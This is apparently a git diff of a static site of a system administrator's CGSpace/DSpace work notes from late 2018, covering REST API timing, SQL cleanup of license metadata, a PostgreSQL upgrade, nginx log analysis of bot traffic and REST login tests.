<li>I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?</li>
<li>I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!</li>
</ul>
<pre><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 0% cpu 25.017 total
0.23s user 0.02s system 1% cpu 23.299 total
@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
</code></pre><ul>
<li>If I make a request without the expands it is ten times faster:</li>
</ul>
<pre><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 7% cpu 3.098 total
0.22s user 0.03s system 8% cpu 2.896 total
@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>Most of them are from Bioversity, and I asked Maria for permission before updating them</li>
<li>I manually went through and looked at the existing values and updated them in several batches:</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
'%/by-nc%' AND text_value LIKE '%2.5%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%CC BY %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-ND%&#39; AND text_value LIKE &#39;%by-nc-nd%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-SA%&#39; AND text_value LIKE &#39;%by-nc-sa%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value LIKE &#39;%/by/%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%/by/%&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-2.5&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
&#39;%/by-nc%&#39; AND text_value LIKE &#39;%2.5%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%/by-nc%&#39; AND text_value LIKE &#39;%4.0%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial-ShareAlike%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value=&#39;CC-BY&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value NOT LIKE &#39;%CC0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%CC-%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
</code></pre><ul>
<li>I updated the fields on CGSpace and then started a re-index of Discovery</li>
<li>We also need to re-think the <code>dc.rights</code> field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)</li>
<li>Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server</li>
<li>IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script, and regenerated the controlled vocabulary:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt;
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt;
2018-10-17-orcids.txt
$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -444,7 +444,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I also decided to add the ORCID identifiers that MEL had sent us a few months ago&hellip;</li>
<li>One problem I had with the <code>resolve-orcids.py</code> script is that one user seems to have disabled their profile data since we last updated:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0001-7930-5752
Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
</code></pre><ul>
<li>So I need to handle that situation in the script for sure, but I&rsquo;m not sure what to do organizationally or ethically, since that user disabled their name! Do we remove him from the list?</li>
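<ul>
<li>A minimal sketch of how the script could detect that case and skip the update, assuming the public ORCID API&rsquo;s <code>personal-details</code> endpoint (the endpoint and JSON layout here are assumptions, not necessarily what <code>resolve-orcids.py</code> does today):</li>
</ul>
<pre><code>import requests


def lookup_orcid_name(orcid):
    # Assumed public ORCID API endpoint and JSON layout
    url = 'https://pub.orcid.org/v2.1/{0}/personal-details'.format(orcid)
    response = requests.get(url, headers={'Accept': 'application/json'})
    response.raise_for_status()

    name = response.json().get('name') or {}
    given = (name.get('given-names') or {}).get('value')
    family = (name.get('family-name') or {}).get('value')

    if not given and not family:
        # Names deactivated or hidden: signal the caller to keep the old value
        return None

    return ' '.join(filter(None, [given, family]))


print(lookup_orcid_name('0000-0001-7930-5752'))  # the deactivated iD from above
</code></pre>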
@ -457,8 +457,8 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>After they do some tests and we check the values Enrico will send a formal email to Peter et al to ask that they start depositing officially</li>
<li>I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually <a href="https://wiki.postgresql.org/wiki/Using_pg_upgrade_on_Ubuntu/Debian">migrate from 9.5 to 9.6</a>:</li>
</ul>
<pre><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
<pre tabindex="0"><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o &#39; -c config_file=/etc/postgresql/9.5/main/postgresql.conf&#39; -O &#39; -c config_file=/etc/postgresql/9.6/main/postgresql.conf&#39;
$ exit
# systemctl start postgresql
# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
@ -468,7 +468,7 @@ $ exit
<li>Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon</li>
<li>Looking at the nginx logs around that time I see the following IPs making the most requests:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Oct/2018:(12|13|14|15)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Oct/2018:(12|13|14|15)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
361 207.46.13.179
395 181.115.248.74
485 66.249.64.93
@ -487,18 +487,18 @@ $ exit
<li>I was going to try to run Solr in Docker because I learned I can run Docker on Travis-CI (for testing my dspace-statistics-api), but the oldest official Solr images are for 5.5, and DSpace&rsquo;s Solr configuration is for 4.9</li>
<li>This means our existing Solr configuration doesn&rsquo;t run in Solr 5.5:</li>
</ul>
<pre><code>$ sudo docker pull solr:5
<pre tabindex="0"><code>$ sudo docker pull solr:5
$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
$ sudo docker logs my_solr
...
ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
ERROR: Error CREATEing SolrCore &#39;statistics&#39;: Unable to create core [statistics] Caused by: solr.IntField
</code></pre><ul>
<li>Apparently a bunch of variable types were removed in <a href="https://issues.apache.org/jira/browse/SOLR-5936">Solr 5</a></li>
<li>So for now it&rsquo;s actually a huge pain in the ass to run the tests for my dspace-statistics-api</li>
<li>Linode sent a message that the CPU usage was high on CGSpace (linode18) last night</li>
<li>According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Oct/2018:(14|15|16)&quot; | awk '{print $1}' | sort
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Oct/2018:(14|15|16)&#34; | awk &#39;{print $1}&#39; | sort
| uniq -c | sort -n | tail -n 10
249 207.46.13.179
250 157.55.39.173
@ -513,19 +513,19 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
</code></pre><ul>
<li>This bot is only using the XMLUI and it does <em>not</em> seem to be re-using its sessions:</li>
</ul>
<pre><code># grep -c 5.9.6.51 /var/log/nginx/*.log
<pre tabindex="0"><code># grep -c 5.9.6.51 /var/log/nginx/*.log
/var/log/nginx/access.log:9323
/var/log/nginx/error.log:0
/var/log/nginx/library-access.log:0
/var/log/nginx/oai.log:0
/var/log/nginx/rest.log:0
/var/log/nginx/statistics.log:0
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-10-20 | sort | uniq
8915
</code></pre><ul>
<li>Last month I added &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager Valve&rsquo;s regular expression matching, and it seems to be working for MegaIndex&rsquo;s user agent:</li>
</ul>
<pre><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'&quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;'
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1&#39; User-Agent:&#39;&#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;&#39;
</code></pre><ul>
<li>So I&rsquo;m not sure why this bot uses so many sessions; is it because it requests very slowly?</li>
</ul>
@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>Change <code>build.properties</code> to use HTTPS for Handles in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
<li>We will still need to do a batch update of the <code>dc.identifier.uri</code> and other fields in the database:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
</code></pre><ul>
<li>While I was doing that I found two items using CGSpace URLs instead of handles in their <code>dc.identifier.uri</code> so I corrected those</li>
<li>I also found several items that had invalid characters or multiple Handles in some related URL field like <code>cg.link.reference</code> so I corrected those too</li>
@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
<li>I deployed the changes on CGSpace, ran all system updates, and rebooted the server</li>
<li>Also, I updated all Handles in the database to use HTTPS:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=replace(text_value, &#39;http://&#39;, &#39;https://&#39;) WHERE resource_type_id=2 AND text_value LIKE &#39;http://hdl.handle.net%&#39;;
UPDATE 76608
</code></pre><ul>
<li>Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem</li>
@ -560,20 +560,20 @@ UPDATE 76608
<li>I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace</li>
<li>Testing REST login and logout via httpie because Felix from Earlham says he&rsquo;s having issues:</li>
</ul>
<pre><code>$ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
<pre tabindex="0"><code>$ http --print b POST &#39;https://dspacetest.cgiar.org/rest/login&#39; email=&#39;testdeposit@cgiar.org&#39; password=deposit
acef8a4a-41f3-4392-b870-e873790f696b
$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
$ http POST &#39;https://dspacetest.cgiar.org/rest/logout&#39; rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
</code></pre><ul>
<li>Also works via curl (login, check status, logout, check status):</li>
</ul>
<pre><code>$ curl -H &quot;Content-Type: application/json&quot; --data '{&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;, &quot;password&quot;:&quot;deposit&quot;}' https://dspacetest.cgiar.org/rest/login
<pre tabindex="0"><code>$ curl -H &#34;Content-Type: application/json&#34; --data &#39;{&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;, &#34;password&#34;:&#34;deposit&#34;}&#39; https://dspacetest.cgiar.org/rest/login
e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:true,&quot;email&quot;:&quot;testdeposit@cgiar.org&quot;,&quot;fullname&quot;:&quot;Test deposit&quot;,&quot;token&quot;:&quot;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot;}
$ curl -X POST -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: application/json&quot; -H &quot;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&quot; https://dspacetest.cgiar.org/rest/status
{&quot;okay&quot;:true,&quot;authenticated&quot;:false,&quot;email&quot;:null,&quot;fullname&quot;:null,&quot;token&quot;:null}%
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:true,&#34;email&#34;:&#34;testdeposit@cgiar.org&#34;,&#34;fullname&#34;:&#34;Test deposit&#34;,&#34;token&#34;:&#34;e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34;}
$ curl -X POST -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/logout
$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:false,&#34;email&#34;:null,&#34;fullname&#34;:null,&#34;token&#34;:null}%
</code></pre><ul>
<li>Improve the documentation of my <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a></li>
<li>Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners</li>
@ -656,15 +656,15 @@ $ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: app
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ Today these are the top 10 IPs:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ Today these are the top 10 IPs:
<p class="blog-post-meta">
<time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -132,7 +132,7 @@ Today these are the top 10 IPs:
<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
<li>Today these are the top 10 IPs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1300 66.249.64.63
1384 35.237.175.180
1430 138.201.52.218
@ -148,22 +148,22 @@ Today these are the top 10 IPs:
<li><code>70.32.83.92</code> is well known, probably CCAFS or something, as it&rsquo;s only a few thousand requests and always to REST API</li>
<li><code>84.38.130.177</code> is some new IP in Latvia that is only hitting the XMLUI, using the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
</code></pre><ul>
<li>They at least seem to be re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177&#39; dspace.log.2018-11-03
342
</code></pre><ul>
<li><code>50.116.102.77</code> is also a regular REST API user</li>
<li><code>40.77.167.175</code> and <code>207.46.13.156</code> seem to be Bing</li>
<li><code>138.201.52.218</code> seems to be on Hetzner in Germany, but is using this user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>And it doesn&rsquo;t seem they are re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218&#39; dspace.log.2018-11-03
1243
</code></pre><ul>
<li>Ah, we&rsquo;ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day&hellip;</li>
@ -171,7 +171,7 @@ Today these are the top 10 IPs:
<li>Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth</li>
<li>Looking at the nginx logs again I see the following top ten IPs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1979 50.116.102.77
1980 35.237.175.180
2186 207.46.13.156
@ -185,13 +185,13 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li><code>78.46.89.18</code> is new since I last checked a few hours ago, and it&rsquo;s from Hetzner with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>It&rsquo;s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03
8449
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions</em></li>
@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>I think it&rsquo;s reasonable for a human to click one of those links five or ten times a minute&hellip;</li>
<li>To contrast, <code>78.46.89.18</code> made about 300 requests per minute for a few hours today:</li>
</ul>
<pre><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E &#39;03/Nov/2018:[0-9][0-9]:[0-9][0-9]&#39; | sort | uniq -c | sort -n | tail -n 20
286 03/Nov/2018:18:02
287 03/Nov/2018:18:21
289 03/Nov/2018:18:23
@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again</li>
<li>Here are the top ten IPs active so far this morning:</li>
</ul>
